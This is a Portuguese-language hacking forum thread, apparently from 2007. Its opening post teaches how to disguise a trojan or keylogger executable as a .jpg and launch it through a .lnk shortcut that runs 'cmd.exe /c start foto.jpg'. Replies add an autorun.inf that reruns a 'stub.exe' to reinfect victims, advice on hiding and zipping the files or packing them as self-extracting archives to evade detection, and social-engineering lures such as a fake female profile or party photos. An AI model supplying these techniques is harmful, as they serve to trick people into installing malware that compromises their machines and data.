FORUM DARKERS

Pegue um arquivo exe que vc tem, e difarçe ele com uma extensão jpg ou txt, ou outra qualquer.... Para fazer isso para melhor entendimento, crie uma pasta no seu c:\ e coloque o seu executavel dentro dessa pasta, renomeie o seu executavel para um nome qualquer e com uma extensão que disfarçe bem o seu virus, trojan ou kl....

exemplo:trojan.exe, renomeie para trojan.jpg ou trojan.txt, fazendo com que ele se torne um arquivo de extensão diferente.
(http://img367.imageshack.us/img367/3716/imagemig3.jpg)

Agora é hora de criar um arquivo de comando que irá executar o jpg como se fosse um arquivo executável...

clique com o botão direito em uma area em branco e crie um atalho, como mostra a baixo:
(http://img169.imageshack.us/img169/3900/imagem2yf0.jpg)

na primeira opção "linha de comando", selecione o arquivo jpg que esta disfaçado.

na segunda opção "digite um nome para o atalho", coloque um nome qualquer com a extensão lnk.

exemplo: arquivo.lnk

dps clique em concluir.

Agora clique com o botão direito do mouse no arquivo.lnk, voce ira ve esta tela a baixo:

(http://img61.imageshack.us/img61/3917/imagem3es3.jpg)

Na opção "Destino", coloque esta linha de comando %systemroot%\System32\cmd.exe /c start foto.jpg

Ficando assim:

(http://img61.imageshack.us/img61/7189/imagem4uz6.jpg)

O cmd irá executar a extensão jpg como se fosse um exe...
Você pode alterar o ícone do arquivo.lnk como vc quiser...

Fonte: Invasao
Autor: Zørrø

Nossa... Muito bom velho!

Gostei mesmo, ainda não sabia dessa. Com certeza vai ajudar bastante!


Vlw!!!

mt boa essa!!!

Método interessante.. atualmente a galera está "esperta" e mtos já sabem conhecer um executável.. porém nada que uma SEing não resolva... agora com essa aí de .JPG... Háaa.. vai rolar a festa mesmo rs..

[]s

Muito boa essa...

Realmente é um método que vem para ajudar e muito em uma boa seing...

Sem +...

Nussa muito bom com... Parabéns pelo tuto perfeito.

A desvantagem é ter que enviar os dois arquivos se não o mesmo acredito que não fique funcional mais tá valendo.
Abraço!

Quote from: "Zero cool"A desvantagem é ter que enviar os dois arquivos se não o mesmo acredito que não fique funcional mais tá valendo.
Abraço!

É verdade, mas até que não é um grande problema...
Basta colocar o arquivo como oculto e zipar os dois (o oculto e o não oculto) em uma pasta. Daí quando o indivíduo abrir a pasta vai ver só um arquivo...   

Bye!

daria para auto executar o link com um arquivo .inf

esse e um exemple que eu fisse para reinfectar a vitima a cada vez que ele abra o drive D:

conteudo do autorun.inf

[autorun]
icon=stub.exe
open=stub.exe
action=usb stick
label=usb stick
shell\open\command=stub.exe
shell\open=usb stick

usb stick e o label do drive D:

rog

No caminho do atalho %systemroot%\System32\cmd.exe /c start foto.jpg  o "/c" seria a raiz C:\ ??
Pq se vc enviar pra alguem executar os arquivos deveriam estar na raiz.
Estou correto?

Abraços

[keyhell]
Não.. /c é um parâmetro.. e a variável: %systemroot% retorna a pasta onde está instalado o Windows..

Para mais detalhes digite no prompt: cmd /?

E teste: echo %systemroot%..

[]s

muito bom!!

mto boa a dica, vai ser bem util aki pra mim =]

Bom estive pensando, a poucos dias achei um progama no qual vc pode encriptar textos na imagem e ser envia a alguem e essa pessoa com o msm progama pode abrir a imagem e poder ler o texto q foi colocado na msm.. intaum pensando nisso

teria como a gente enserir um codigo WORM , ow algum comando exe dentro da imagem e mandar para alguem p/ que quando essa pessoa abrir a imagem o comando  q foi inserido poder execultar ....

OBS: a imagem irar abrir normal , mais sendo q o texto q no caso um virus ow worm sera acinado apos o click da vitima...


espero retorno

Excelente tecnica, que além de esconder o arquivo, você pode até alterar o icone. 

Agora e so usar a cabeça "Engenharia Social" e pronto.

Gostei muito deste tópico..fiquei sumido mais voltei

Quote from: "# phobia"É verdade, mas até que não é um grande problema...
Basta colocar o arquivo como oculto e zipar os dois (o oculto e o não oculto) em uma pasta.
Daí quando o indivíduo abrir a pasta vai ver só um arquivo...   ;D

Bye!

Se o server ou trojan for detectável use o filzip (//http://rapidshare.com/files/63701437/filzip_305.exe) para criar um arquivo sfx,
como eram criados os joiners antigamente, com algumas adaptações, é claro!

Mt boooouumm meessmo!!  E o que é melhor.. de fácil entendimento!!!  

A forma que foi explicado é sumariamente perfeita...até eu um simples...na arte...aprendi...?

Parabéns!?

Boa TArde.

Isso é otimo...

Oque voce tambem pode fazer eh o seguinte...colokar varias fotos num arquivo .rar ou .zip para mandar pra vitima (jah q 1 ou 2 fotos nao ha a "necessidade" de zipar) e dentro desse .rar esconder o arquivo.ink...usando uam boa engenharia social dizendo q vc zipou todas as foto pra enviar masi rapidamente e de uma soh vez...

Se vc estiver realmente afim de pegar "aquele" cara em especial vale a pena...criando um perfil/msn de uma mulher e falando q eh u book de modelo...para uma pessoa q vc conhece na vida real dizendo q sao fotos de uma festa e por ai vai...todo mundo tem um cerebro

abraços..

Muito obrigado, e parabéns,
isso aí vai ajudar muita gente!  ;)

tipo... muda a extensão do arquivo sem altera a funcionalidade é um otimo metodo...
rs... td mundo sabe q um arquivo .exe pode ser perigoso, mas um .jpg ninguem desconfia ;]
ótimo post!
abrasss

Quote from: rog on 01 de April , 2007, 02:48:29 PM
daria para auto executar o link com um arquivo .inf

esse e um exemple que eu fisse para reinfectar a vitima a cada vez que ele abra o drive D:

conteudo do autorun.inf

[autorun]
icon=stub.exe
open=stub.exe
action=usb stick
label=usb stick
shell\open\command=stub.exe
shell\open=usb stick

usb stick e o label do drive D:

rog

nao entendi direito =(    como eu faria para ser no driver c:  eu tentei aki e nao deu =/

aparece falha na instalaçao

Alguem ?  :D

Máquina Virtual 01

Olá, desculpe o incomodo, mas já realizei vários testes diferentes,
e gostaria de saber se tem como executar o atalho dentro do arquivo zipado ou .rar,
tentei de todas as maneiras e não deu certo. Mas quando extraí o arquivo e coloquei em pastas diferentes apagando ou não as pastas que eu tinha extraído deu tudo certo.

Máquina Virtual 02

Bom, na minha Máquina Virtual 02, criei atalhos diversos, tanto para jpg quanto para .exe inserindo o código para o cmd interpretar o arquivo como um executável e não deu certo de maneira nenhuma, sempre dá esse erro.

Erro de Aplicativo
Aplicativo não inicializado corretamente (0xc0000135). Clique em 'OK' para finalizar a execução.

Alguém poderia me ajudar porfavor?

Muito boa a dica  :)
Obrigado!

não pego imagem aki

bad picture... not load  >:(

valeu cara muito bom...